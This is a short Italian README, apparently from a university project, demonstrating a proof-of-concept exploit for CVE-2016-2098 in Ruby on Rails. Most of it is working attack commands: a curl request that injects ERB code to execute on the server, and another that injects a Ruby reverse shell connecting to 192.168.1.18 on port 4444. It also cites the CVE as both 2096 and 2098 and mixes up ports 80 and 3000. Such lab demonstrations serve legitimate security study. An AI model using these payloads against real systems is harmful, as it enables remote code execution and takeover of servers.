
Prova di concetto CVE-2016-2098
Progetto universitario creato da @alejandro-marting dove possiamo verificare la vulnerabilità 2096
Utilizzando:
Per prima cosa dobbiamo avviare il server Rails con il seguente comando:
$ rvmsudo rails server -b 0.0.0.0 -p 80
Ora possiamo causare l'esecuzione remota di codice con il seguente comando:
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(Dovrebbe essere generato un file chiamato rooted)
Se vuoi provare una reverse shell con iniezione di codice Ruby, puoi eseguire il comando seguente:
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
Se hai domande, contattami per favore!